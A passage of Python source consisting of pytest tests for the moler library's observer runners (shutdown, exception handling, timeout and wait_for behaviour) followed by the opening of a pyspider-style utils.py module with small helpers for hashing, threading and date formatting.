    from moler.observable_connection import ObservableConnection

    conn = ObservableConnection()
    # shutdown must stop every observer running inside the given runner
    detectors = [NetworkDownDetector(connection=conn, runner=observer_runner) for _ in range(2)]
    for detector in detectors:
        detector.start_time = time.time()  # observer lifetime starts before runner.submit()
        observer_runner.submit(detector)
    conn.data_received("61 bytes")
    observer_runner.shutdown()
    conn.data_received("62 bytes")  # arrives while runner is shut down - must be dropped
    for detector in detectors:
        assert detector.all_data_received == ["61 bytes"]
@pytest.mark.asyncio
async def test_runner_unsubscribes_from_connection_after_runner_shutdown(observer_runner):
    """Runner shutdown must unsubscribe every observer it runs from the moler-connection."""
    # see - Raw 'def' usage note
    from moler.observable_connection import ObservableConnection

    conn = ObservableConnection()
    detectors = [NetworkDownDetector(connection=conn, runner=observer_runner) for _ in range(2)]
    for detector in detectors:
        detector.start_time = time.time()  # observer lifetime starts before runner.submit()
    assert len(conn._observers) == 0
    for detector in detectors:
        observer_runner.submit(detector)
    assert len(conn._observers) == 2
    observer_runner.shutdown()
    await asyncio.sleep(0.1)  # give the runner a moment to unsubscribe
    assert len(conn._observers) == 0
# TODO: test_runner_unsubscribes_from_connection_after_observer_is_done
@pytest.mark.asyncio
async def test_runner_doesnt_break_on_exception_raised_inside_observer(observer_runner):
    """Runner should be secured against 'wrongly written' connection-observer"""
    # see - Raw 'def' usage note
    with failing_net_down_detector(fail_on_data="zero bytes",
                                   fail_by_raising=Exception("unknown format"),
                                   runner=observer_runner) as conn_observer:
        connection = conn_observer.connection
        conn_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
        observer_runner.submit(conn_observer)
        connection.data_received("61 bytes")
        # observer raises on "zero bytes" - runner must survive and stop feeding the observer
        connection.data_received("zero bytes")
        connection.data_received("ping: Network is unreachable")
        assert conn_observer.all_data_received == ["61 bytes"]
# --------------------------------------------------------------------
# Testing exceptions handling
# Runner is involved in data path securing
# --------------------------------------------------------------------
# TODO: correct handling/storage of stack-trace of caught exceptions
@pytest.mark.asyncio
async def test_runner_sets_observer_exception_result_for_exception_raised_inside_observer(observer_runner):
    """Runner should correct behaviour of 'wrongly written' connection-observer"""
    # Correctly written observer should not allow exceptions escaping from data_received().
    # Such exceptions should be caught and stored inside observer via set_exception()
    # see - Raw 'def' usage note
    unknown_format_exception = Exception("unknown format")
    with failing_net_down_detector(fail_on_data="zero bytes",
                                   fail_by_raising=unknown_format_exception,
                                   runner=observer_runner) as conn_observer:
        connection = conn_observer.connection
        conn_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
        observer_runner.submit(conn_observer)
        connection.data_received("61 bytes")
        # observer raises on "zero bytes" - runner must store it via set_exception()
        connection.data_received("zero bytes")
        connection.data_received("ping: Network is unreachable")
        assert conn_observer._exception is unknown_format_exception
@pytest.mark.asyncio
async def test_future_is_not_exception_broken_when_observer_is_exception_broken(observer_runner):
    """The runner-created future must stay exception-clean even when the observer breaks."""
    # Runner created future is involved in data path handling.
    # That handling includes catching/storing exceptions. But such exception is exception of connection_observer
    # and not future itself - future behaviour is OK when it can correctly handle exception of observer.
    # see - Raw 'def' usage note
    with failing_net_down_detector(fail_on_data="zero bytes",
                                   fail_by_raising=Exception("unknown format"),
                                   runner=observer_runner) as conn_observer:
        connection = conn_observer.connection
        conn_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
        future = observer_runner.submit(conn_observer)
        connection.data_received("61 bytes")
        connection.data_received("zero bytes")
        await asyncio.sleep(0.2)
        assert future.exception() is None  # assumption here: used future has .exception() API
@pytest.mark.asyncio
async def test_future_doesnt_return_result_of_observer(net_down_detector):
    """Future just returns None when it is done"""
    # see - Raw 'def' usage note
    runner = net_down_detector.runner
    conn = net_down_detector.connection
    net_down_detector.start_time = time.time()  # observer lifetime starts before runner.submit()
    background_future = runner.submit(net_down_detector)
    for line in ("61 bytes", "ping: Network is unreachable"):
        conn.data_received(line)
    await asyncio.sleep(0.2)  # let the future complete
    assert background_future.result() is None
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part I - future's reaction on timeout
# Future is a result produced by runner.submit(). Future expresses
# "background life" of connection observer. In part I we test
# pure-background-life without impact of wait_for() API - means
# just send it to background and wait till timeout
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_future_timeouts_after_timeout_of_observer(connection_observer):
    """Observer has .timeout member"""
    # see - Raw 'def' usage note
    from moler.exceptions import ResultNotAvailableYet, MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.1
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = observer_runner.submit(connection_observer)
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    await asyncio.sleep(0.2)  # longer than observer.timeout
    with pytest.raises(MolerTimeout):
        connection_observer.result()  # we should have exception in connection_observer
    assert future.done()
    if not future.cancelled():  # future for timeouted observer should be either cancelled
        assert future.exception() is None  # or done with no exception inside future itself
@pytest.mark.asyncio
async def test_future_accommodates_to_extending_timeout_of_observer(connection_observer):
    """Extending observer.timeout while running must postpone the moment the future times out."""
    # see - Raw 'def' usage note
    import logging
    from moler.exceptions import ResultNotAvailableYet, MolerTimeout
    logger = logging.getLogger('moler.runner')
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.2
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    observer_runner.submit(connection_observer)
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    logger.debug("first await asyncio.sleep(0.1)")
    await asyncio.sleep(0.1)
    logger.debug("after first await asyncio.sleep(0.1)")
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    connection_observer.timeout = 0.5  # EXTEND
    logger.debug("second await asyncio.sleep(0.1)")
    await asyncio.sleep(0.1)
    logger.debug("after second await asyncio.sleep(0.1)")
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    logger.debug("final await asyncio.sleep(0.4)")
    await asyncio.sleep(0.4)
    logger.debug("after final await asyncio.sleep(0.4)")
    with pytest.raises(MolerTimeout):  # should time out
        connection_observer.result()
@pytest.mark.asyncio
async def test_future_accommodates_to_shortening_timeout_of_observer(connection_observer):
    """Shortening observer.timeout while running must make the future time out earlier."""
    # see - Raw 'def' usage note
    from moler.exceptions import ResultNotAvailableYet, MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.2
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    observer_runner.submit(connection_observer)
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    await asyncio.sleep(0.08)
    with pytest.raises(ResultNotAvailableYet):  # not timed out yet
        connection_observer.result()
    connection_observer.timeout = 0.1  # SHORTEN
    await asyncio.sleep(0.04)  # 0.08 + 0.04 > shortened 0.1 timeout
    with pytest.raises(MolerTimeout):  # should time out
        connection_observer.result()
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part II - timeouts while inside wait_for()
# wait_for() API takes observer from background-life into foreground-life
# testing here:
# being inside blocking wait_for() - escape it on timeout
# --------------------------------------------------------------------
def test_wait_for__times_out_on_constructor_timeout(connection_observer):
    """wait_for(timeout=None) must honour the observer's own .timeout."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.2
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    with pytest.raises(MolerTimeout):
        observer_runner.wait_for(connection_observer, future,
                                 timeout=None)  # means: use .timeout of observer
        connection_observer.result()  # should raise Timeout
    duration = time.time() - start_time
    assert duration >= 0.2
    assert duration < 0.25
    time.sleep(0.1)  # future may be 'not done yet' (just after timeout) - it should be "in exiting of feed"
    assert future.done()
    if not future.cancelled():  # future for timeouted observer should be either cancelled
        assert future.exception() is None  # or done with no exception inside future itself
def test_wait_for__times_out_on_specified_timeout(connection_observer):
    """An explicit wait_for(timeout=...) shorter than observer.timeout must win."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 1.5
    connection_observer.terminating_timeout = 0.0
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    time.sleep(0.1)
    with pytest.raises(MolerTimeout):
        wait4_start_time = time.time()  # wait_for() timeout is counted from wait_for() line in code
        observer_runner.wait_for(connection_observer, future,
                                 timeout=0.2)  # means: use timeout of wait_for (shorter than initial one)
        connection_observer.result()  # should raise Timeout
    now = time.time()
    observer_life_duration = now - start_time
    wait4_duration = now - wait4_start_time
    assert wait4_duration >= 0.2
    assert wait4_duration < 0.3
    assert observer_life_duration >= 0.3
    assert observer_life_duration < 0.4
def test_wait_for__times_out_on_earlier_timeout(connection_observer):
    """The observer's own (earlier) timeout must win over a longer wait_for(timeout=...)."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.3
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    with pytest.raises(MolerTimeout):
        wait4_start_time = time.time()  # wait_for() timeout is counted from wait_for() line in code
        observer_runner.wait_for(connection_observer, future,
                                 timeout=0.5)  # means: timeout of wait_for longer than initial one
        connection_observer.result()  # should raise Timeout
    now = time.time()
    observer_life_duration = now - start_time
    wait4_duration = now - wait4_start_time
    assert observer_life_duration >= 0.3
    assert observer_life_duration < 0.35
    assert wait4_duration < 0.5
def test_wait_for__tracks_changes_of_observer_timeout__extension(connection_observer):
    """A timeout extended by another thread while blocked inside wait_for() must be respected."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.2
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    def modify_observer_timeout():
        time.sleep(0.15)
        connection_observer.timeout = 0.35  # extend while inside wait_for()
    threading.Thread(target=modify_observer_timeout).start()
    with pytest.raises(MolerTimeout):
        observer_runner.wait_for(connection_observer, future,
                                 timeout=None)
        connection_observer.result()  # should raise Timeout
    duration = time.time() - start_time
    assert duration >= 0.35
    assert duration < 0.4
def test_wait_for__tracks_changes_of_observer_timeout__shortening(connection_observer):
    """A timeout shortened by another thread while blocked inside wait_for() must be respected."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.35
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    def modify_observer_timeout():
        time.sleep(0.05)
        connection_observer.timeout = 0.2  # shorten while inside wait_for()
    threading.Thread(target=modify_observer_timeout).start()
    with pytest.raises(MolerTimeout):
        observer_runner.wait_for(connection_observer, future,
                                 timeout=None)
        connection_observer.result()  # should raise Timeout
    duration = time.time() - start_time
    assert duration >= 0.2
    assert duration < 0.25
def test_wait_for__direct_timeout_takes_precedence_over_extended_observer_timeout(connection_observer):
    """An explicit wait_for(timeout=...) wins even when observer.timeout is extended meanwhile."""
    # this is another variant of test_wait_for__times_out_on_earlier_timeout
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.2
    connection_observer.terminating_timeout = 0.0
    start_time = connection_observer.start_time = time.time()
    future = observer_runner.submit(connection_observer)
    def modify_observer_timeout():
        time.sleep(0.15)
        connection_observer.timeout = 0.4  # extend while inside wait_for()
    threading.Thread(target=modify_observer_timeout).start()
    with pytest.raises(MolerTimeout):
        wait4_start_time = time.time()  # wait_for() timeout is counted from wait_for() line in code
        observer_runner.wait_for(connection_observer, future,
                                 timeout=0.25)  # should take precedence, means: 0.25 sec from now
        connection_observer.result()  # should raise Timeout
    now = time.time()
    observer_life_duration = now - start_time
    wait4_duration = now - wait4_start_time
    assert wait4_duration >= 0.25
    assert wait4_duration < 0.35
    assert observer_life_duration > 0.2
    assert observer_life_duration < 0.4
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part III - on_timeout() callback
# --------------------------------------------------------------------
def test_observer__on_timeout__is_called_once_at_timeout(connection_observer):
    """The on_timeout() callback must fire exactly once when the observer times out."""
    from moler.exceptions import MolerTimeout
    observer_runner = connection_observer.runner
    connection_observer.timeout = 0.33
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = observer_runner.submit(connection_observer)
    with mock.patch.object(connection_observer, "on_timeout") as timeout_callback:
        with pytest.raises(MolerTimeout):
            observer_runner.wait_for(connection_observer, future,
                                     timeout=0.33)
            connection_observer.result()  # should raise Timeout
        timeout_callback.assert_called_once()
def test_runner_shutdown_cancels_remaining_active_feeders_inside_main_thread(async_runner):
    """Shutdown must cancel a feeder that already started processing inside the event loop."""
    from moler.observable_connection import ObservableConnection
    connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = async_runner.submit(connection_observer)
    future._loop.run_until_complete(asyncio.sleep(1.0))  # feeder will start processing inside loop
    # time.sleep(0.5)
    async_runner.shutdown()
    assert connection_observer.cancelled()
def test_runner_shutdown_cancels_remaining_inactive_feeders_inside_main_thread(observer_runner):
    """Shutdown must cancel a submitted observer whose feeder never started processing."""
    from moler.observable_connection import ObservableConnection

    detector = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
    detector.start_time = time.time()  # observer lifetime starts before runner.submit()
    observer_runner.submit(detector)
    time.sleep(0.2)  # won't enter event loop of future - feeder won't start processing
    observer_runner.shutdown()
    assert detector.cancelled()
def test_runner_shutdown_cancels_remaining_feeders_inside_threads(observer_runner):
    """Shutdown must cancel feeders that were submitted and are awaited from separate threads."""
    from moler.observable_connection import ObservableConnection
    observers_pool = []
    for idx in range(3):
        connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
        observers_pool.append(connection_observer)
    def submit_feeder(connection_observer):
        connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
        future = observer_runner.submit(connection_observer)
        while not future.done():
            time.sleep(0.1)
    th_pool = [threading.Thread(target=submit_feeder, args=(connection_observer,)) for connection_observer in observers_pool]
    for th in th_pool:
        th.start()
    # loop.run_until_complete(remaining_tasks)  # let it enter feeder
    time.sleep(0.5)
    observer_runner.shutdown()
    for th in th_pool:
        th.join()
    assert observers_pool[0].cancelled()
    assert observers_pool[1].cancelled()
    assert observers_pool[2].cancelled()
# def test_observer__on_timeout__is_called_once_at_timeout_threads_races(observer_runner):
# from moler.exceptions import MolerTimeout
# from moler.observable_connection import ObservableConnection
#
# with disabled_logging():
# observers_pool = []
# for idx in range(200):
# connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
# connection_observer.timeout = 0.33
# connection_observer.on_timeout = mock.MagicMock()
# observers_pool.append(connection_observer)
#
# def await_on_timeout(connection_observer):
# connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
# future = observer_runner.submit(connection_observer)
# with pytest.raises(MolerTimeout):
# observer_runner.wait_for(connection_observer, future, timeout=0.33)
# connection_observer.result() # should raise Timeout
#
# th_pool = [threading.Thread(target=await_on_timeout, args=(connection_observer,)) for connection_observer in observers_pool]
# for th in th_pool:
# th.start()
# for th in th_pool:
# th.join()
#
# for connection_observer in observers_pool:
# timeout_callback = connection_observer.on_timeout
# timeout_callback.assert_called_once()
# --------------------------------------------------------------------
# Testing wait_for() API
#
# (timeouts inside wait_for are covered above)
# Should exit from blocking call when expected data comes.
# Future should be done as well.
# --------------------------------------------------------------------
def test_can_await_connection_observer_to_complete(observer_and_awaited_data):
    """Blocking wait_for() should return once awaited data arrives; observer and future end up done."""
    connection_observer, awaited_data = observer_and_awaited_data
    observer_runner = connection_observer.runner
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = observer_runner.submit(connection_observer)

    def inject_data():
        # Simulate external I/O feeding the connection shortly after submit.
        time.sleep(0.1)
        moler_conn = connection_observer.connection
        moler_conn.data_received(awaited_data)

    ext_io = threading.Thread(target=inject_data)
    ext_io.start()
    # 0.3s timeout > 0.1s injection delay, so data should arrive well in time.
    observer_runner.wait_for(connection_observer, future,
                             timeout=0.3)
    assert connection_observer.done()  # done but success or failure?
    assert connection_observer.result() is not None  # it should be success
    assert future.done()
    assert future.result() is None  # asserted: feeder future carries no value; result is read off the observer
# --------------------------------------------------------------------
# Testing wait_for_iterator() API
#
# Should exit from blocking call when expected data comes.
# Future should be done as well.
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_can_async_await_connection_observer_to_complete(observer_and_awaited_data):
    """'await observer' should complete once awaited data arrives; observer and future end up done."""
    connection_observer, awaited_data = observer_and_awaited_data
    observer_runner = connection_observer.runner
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = observer_runner.submit(connection_observer)
    connection_observer.timeout = 0.3  # must exceed the 0.1s injection delay below

    def inject_data():
        # Simulate external I/O feeding the connection shortly after submit.
        time.sleep(0.1)
        moler_conn = connection_observer.connection
        moler_conn.data_received(awaited_data)

    ext_io = threading.Thread(target=inject_data)
    ext_io.start()
    # Wire the observer to its future/runner so that __await__ has what it needs.
    connection_observer._future = future
    connection_observer.runner = observer_runner
    # connection_observer.__await__ calls connection_observer.runner.wait_for_iterator(connection_observer,
    #                                                                                  connection_observer._future)
    await connection_observer
    assert connection_observer.done()  # done but success or failure?
    assert connection_observer.result() is not None  # it should be success
    assert future.done()
    assert future.result() is None  # asserted: feeder future carries no value; result is read off the observer
# --------------------------------------------------------------------
# Testing correct usage
#
# We want to be helpful for users. Even if some usage is 'user fault'
# (like calling long lasting functions inside async code) we want
# to inform about such cases as much as we can. Not always it is possible.
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_wait_for__is_prohibited_inside_async_def(async_runner):
    """Async runner's blocking wait_for() must raise WrongUsage when called from 'async def'."""
    # can't raise in generic runner since why non-async-runner should bother about being used inside 'async def'
    # using them in such case is end-user error the same way as using time.sleep(2.41) inside 'async def'
    from moler.exceptions import WrongUsage
    from moler.observable_connection import ObservableConnection

    # TODO: can we confidently check "called from async def"
    # https://stackoverflow.com/questions/30155138/how-can-i-write-asyncio-coroutines-that-optionally-act-as-regular-functions
    # "magically_determine_if_being_yielded_from() is actually event_loop.is_running()"
    # but that works for asyncio and not for curio/trio
    #
    # Any way to treat wait_for() as awaitable?
    #
    connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
    connection_observer.start_time = time.time()  # must start observer lifetime before runner.submit()
    future = async_runner.submit(connection_observer)
    with pytest.raises(WrongUsage) as err:
        async_runner.wait_for(connection_observer, future)
        connection_observer.result()  # should raise WrongUsage
    assert "Can't call wait_for() from 'async def' - it is blocking call" in str(err.value)
    # check "fix-hint" inside exception
    assert re.findall(r'consider using:\s+await observer\s+instead of:\s+observer.await_done()', str(err.value))
@pytest.mark.asyncio
async def test_wait_for__prohibited_inside_async_def_speaks_in_observer_API(async_runner):
    """observer.await_done() called inside 'async def' must raise WrongUsage with a fix-hint."""
    from moler.exceptions import WrongUsage
    from moler.observable_connection import ObservableConnection
    connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
    connection_observer.start()  # internally calls async_runner.submit()
    # NOTE(review): start() already submits to the runner; the extra submit() below
    # looks redundant (its future is never used) — confirm intent.
    future = async_runner.submit(connection_observer)
    with pytest.raises(WrongUsage) as err:
        connection_observer.await_done()  # internally calls async_runner.wait_for() + connection_observer.result()
    assert "Can't call await_done() from 'async def' - it is blocking call" in str(err.value)
    # check "fix-hint" inside exception
    assert re.findall(r'consider using:\s+await observer\s+instead of:\s+observer.await_done()', str(err.value))
# TODO: test usage of iterable/awaitable
# TODO: handling not awaited futures (infinite background observer, timeouting observer but "failing path stopped"
# --------------------------- resources ---------------------------
def is_python36_or_above():
    """Return True when the interpreter is Python 3.6 or newer (asyncio runners need it)."""
    # sys.version_info compares as a tuple, which is more robust than the old
    # text parsing of platform.python_version() (string major-compare broke the
    # "or above" intent for any future major version).
    import sys
    return sys.version_info >= (3, 6)
# bg_runners may be called from both 'async def' and raw 'def' functions
# (a dead "available_bg_runners = []" line that was immediately overwritten
# has been removed here).
available_bg_runners = ['runner.ThreadPoolExecutorRunner']
# standalone_runners may run without giving up control to some event loop (since they create own thread(s))
available_standalone_runners = ['runner.ThreadPoolExecutorRunner']
# async_runners may be called only from 'async def' functions and require already running events-loop
available_async_runners = []
if is_python36_or_above():
    available_bg_runners.append('asyncio_runner.AsyncioRunner')
    available_async_runners.append('asyncio_runner.AsyncioRunner')
    # NOTE(review): AsyncioInThreadRunner variants were left disabled in the
    # original; reason not recorded here.
    # available_bg_runners.append('asyncio_runner.AsyncioInThreadRunner')
    # available_async_runners.append('asyncio_runner.AsyncioInThreadRunner')
    # available_standalone_runners.append('asyncio_runner.AsyncioInThreadRunner')
@pytest.yield_fixture(params=available_bg_runners)
def observer_runner(request):
    """Yield a background-runner instance built from the parametrized 'module.Class' path."""
    mod_path, _, cls_name = request.param.rpartition('.')
    runner_cls = getattr(importlib.import_module('moler.{}'.format(mod_path)), cls_name)
    instance = runner_cls()
    # NOTE: AsyncioRunner given here will start without running event loop
    yield instance
    # drop any exceptions collected inside ConnectionObserver during the test
    ConnectionObserver.get_unraised_exceptions(remove=True)
    instance.shutdown()
@pytest.yield_fixture(params=available_standalone_runners)
def standalone_runner(request):
    """Yield a standalone-runner instance built from the parametrized 'module.Class' path."""
    mod_path, _, cls_name = request.param.rpartition('.')
    runner_cls = getattr(importlib.import_module('moler.{}'.format(mod_path)), cls_name)
    instance = runner_cls()
    yield instance
    # drop any exceptions collected inside ConnectionObserver during the test
    ConnectionObserver.get_unraised_exceptions(remove=True)
    instance.shutdown()
@pytest.yield_fixture(params=available_async_runners)
def async_runner(request):
    """Yield an async-only runner instance built from the parametrized 'module.Class' path."""
    mod_path, _, cls_name = request.param.rpartition('.')
    runner_cls = getattr(importlib.import_module('moler.{}'.format(mod_path)), cls_name)
    instance = runner_cls()
    yield instance
    # drop any exceptions collected inside ConnectionObserver during the test
    ConnectionObserver.get_unraised_exceptions(remove=True)
    instance.shutdown()
class NetworkDownDetector(ConnectionObserver):
    """Observer that completes when 'Network is unreachable' shows up in connection data."""

    def __init__(self, connection=None, runner=None):
        super(NetworkDownDetector, self).__init__(connection=connection, runner=runner)
        self.all_data_received = []  # every chunk ever passed to data_received()

    def data_received(self, data):
        """
        Awaiting change like:

        64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
        ping: sendmsg: Network is unreachable
        """
        self.all_data_received.append(data)
        if self.done():
            return
        if "Network is unreachable" in data:
            # Record the detection moment as the observer's result.
            self.set_result(result=time.time())
@pytest.yield_fixture()
def connection_observer(observer_runner):
    """Yield a NetworkDownDetector wired to a fresh ObservableConnection."""
    from moler.observable_connection import ObservableConnection
    detector = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
    yield detector
    # drop any exceptions collected inside ConnectionObserver during the test
    ConnectionObserver.get_unraised_exceptions(remove=True)
@pytest.fixture()
def net_down_detector(connection_observer):  # let name say what type of observer it is
    """Alias fixture: same object as connection_observer, under a type-revealing name."""
    return connection_observer
@contextlib.contextmanager
def failing_net_down_detector(fail_on_data, fail_by_raising, runner):
    """Yield a NetworkDownDetector whose data_received() raises *fail_by_raising*
    when fed exactly *fail_on_data*; cleans collected exceptions on exit."""
    from moler.observable_connection import ObservableConnection

    class FailingNetworkDownDetector(NetworkDownDetector):
        def data_received(self, data):
            # Fail only on the designated payload; otherwise behave normally.
            if data == fail_on_data:
                raise fail_by_raising
            return super(FailingNetworkDownDetector, self).data_received(data)

    moler_conn = ObservableConnection()
    failing_detector = FailingNetworkDownDetector(connection=moler_conn, runner=runner)
    yield failing_detector
    # remove exceptions collected inside ConnectionObserver
    ConnectionObserver.get_unraised_exceptions(remove=True)
@pytest.fixture()
def observer_and_awaited_data(connection_observer):
    """Pair a ready observer with the exact line that should complete it."""
    return connection_observer, 'ping: sendmsg: Network is unreachable'
@pytest.fixture(scope='module', autouse=True)
def use_loud_event_loop():
    """Install LoudEventLoopPolicy for the whole module (autouse).

    NOTE(review): presumably makes event-loop problems loud instead of
    silently swallowed — see moler.asyncio_runner for its exact behavior.
    """
    from moler.asyncio_runner import LoudEventLoopPolicy
    loud_policy = LoudEventLoopPolicy()
    asyncio.set_event_loop_policy(loud_policy)
@pytest.yield_fixture()
def event_loop():
    """Per-test event loop (picked up by @pytest.mark.asyncio) with feeder cleanup on teardown."""
    from moler.asyncio_runner import cancel_remaining_feeders
    loop = asyncio.get_event_loop_policy().new_event_loop()
    yield loop
    # event_loop fixture is autoloaded by @pytest.mark.asyncio decorator
    # and inside some of our async tests we just submit() observer inside runner without stopping it
    # so, we need to stop all submitted futures
    cancel_remaining_feeders(loop)
    loop.close()
|
utils.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2012-11-06 11:50:13
import math
import sys
import codecs
import logging
import hashlib
import datetime
import pickle
import socket
import base64
import warnings
import threading
import six
from six import iteritems
def md5string(x):
    """Return the hex MD5 digest of *x* (encoded to bytes via utf8())."""
    # Was a lambda bound to a name (PEP 8 E731); a def gives a proper __name__
    # and traceback.
    return hashlib.md5(utf8(x)).hexdigest()
class ReadOnlyDict(dict):
    """A Read Only Dict: reads and construction behave like dict, item assignment is rejected."""

    def __setitem__(self, key, value):
        # Reject every mutation attempted through item assignment.
        raise Exception("dict is read-only")
def getitem(obj, key=0, default=None):
    """Return obj[key], or *default* when the lookup fails.

    Works for sequences (IndexError), mappings (KeyError) and
    non-subscriptable objects such as None (TypeError).
    """
    try:
        return obj[key]
    except (IndexError, KeyError, TypeError):
        # Narrowed from a bare 'except:' which also swallowed
        # KeyboardInterrupt / SystemExit.
        return default
def hide_me(tb, g=globals()):
    """Hide stack traceback of given stack.

    Walks the traceback chain: first skips frames that do not belong to
    module globals *g*, then skips the run of frames that do, returning the
    first frame past this module. Falls back to the original traceback when
    the walk raises or exhausts the chain.

    NOTE: ``g=globals()`` is evaluated once at definition time on purpose —
    it pins this module's globals as the frames to hide.
    """
    base_tb = tb
    try:
        while tb and tb.tb_frame.f_globals is not g:
            tb = tb.tb_next
        while tb and tb.tb_frame.f_globals is g:
            tb = tb.tb_next
    except Exception as e:
        logging.exception(e)
        tb = base_tb
    if not tb:
        tb = base_tb
    return tb
def run_in_thread(func, *args, **kwargs):
    """Run *func* in a daemon thread; return the already-started Thread object."""
    from threading import Thread
    worker = Thread(target=func, args=args, kwargs=kwargs)
    worker.daemon = True  # do not block interpreter exit
    worker.start()
    return worker
def run_in_subprocess(func, *args, **kwargs):
    """Run *func* in a daemon Process; return the already-started Process object."""
    from multiprocessing import Process
    worker = Process(target=func, args=args, kwargs=kwargs)
    worker.daemon = True  # reaped automatically with the parent
    worker.start()
    return worker
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
    """Formats the given date (which should be GMT).

    By default, we return a relative time (e.g., "2 minutes ago"). You
    can return an absolute date string with ``relative=False``.
    You can force a full format date ("July 10, 1980") with
    ``full_format=True``.
    This method is primarily intended for dates in the past.
    For dates in the future, we fall back to full format.
    From tornado
    """
    if not date:
        return '-'
    if isinstance(date, (int, float)):  # epoch seconds -> naive UTC datetime
        date = datetime.datetime.utcfromtimestamp(date)
    now = datetime.datetime.utcnow()
    if date > now:
        if relative and (date - now).seconds < 60:
            # Due to click skew, things are some things slightly
            # in the future. Round timestamps in the immediate
            # future down to now in relative mode.
            date = now
        else:
            # Otherwise, future dates always use the full format.
            full_format = True
    local_date = date - datetime.timedelta(minutes=gmt_offset)
    local_now = now - datetime.timedelta(minutes=gmt_offset)
    local_yesterday = local_now - datetime.timedelta(hours=24)
    difference = now - date
    # NOTE: .seconds is deliberately only the sub-day remainder; the day-scale
    # wording is driven by .days inside fix_full_format().
    seconds = difference.seconds
    days = difference.days

    format = None
    if not full_format:
        # fix_full_format either produces the final relative string
        # (first element True) or just a template to be filled in below.
        # (A dead "else: format = format" branch was removed here.)
        ret_, format = fix_full_format(days, seconds, relative, shorter,
                                       local_date, local_yesterday)
        if ret_:
            return format
    if format is None:
        format = "%(month_name)s %(day)s, %(year)s" if shorter else \
            "%(month_name)s %(day)s, %(year)s at %(time)s"
    str_time = "%d:%02d" % (local_date.hour, local_date.minute)
    return format % {
        "month_name": local_date.strftime('%b'),
        "weekday": local_date.strftime('%A'),
        "day": str(local_date.day),
        "year": str(local_date.year),
        "month": local_date.month,
        "time": str_time
    }
def fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday):
    """Pick either a finished relative phrase or a date-format template.

    Returns (True, final_string) when the answer is a complete relative
    phrase, or (False, template_or_None) when the caller must fill in a
    %-style template (None means "use the caller's default template").
    """
    if relative and days == 0:
        # Same-day relative wording: seconds -> minutes -> hours.
        if seconds < 50:
            phrase = "1 second ago" if seconds <= 1 else "%(seconds)d seconds ago"
            return True, phrase % {"seconds": seconds}
        if seconds < 50 * 60:
            minutes = round(seconds / 60.0)
            phrase = "1 minute ago" if minutes <= 1 else "%(minutes)d minutes ago"
            return True, phrase % {"minutes": minutes}
        hours = round(seconds / (60.0 * 60))
        phrase = "1 hour ago" if hours <= 1 else "%(hours)d hours ago"
        return True, phrase % {"hours": hours}

    template = None
    if days == 0:
        template = "%(time)s"
    elif days == 1 and local_date.day == local_yesterday.day and \
            relative:
        template = "yesterday" if shorter else "yesterday at %(time)s"
    elif days < 5:
        template = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
    elif days < 334:  # 11mo, since confusing for same month last year
        template = "%(month)s-%(day)s" if shorter else \
            "%(month)s-%(day)s at %(time)s"
    return False, template
class TimeoutError(Exception):
    """Raised by the `timeout` context manager below when the time limit hits.

    NOTE: this name shadows the builtin TimeoutError (Python 3.3+); callers
    importing it from this module get this class, not the builtin.
    """
    pass
try:
    import signal
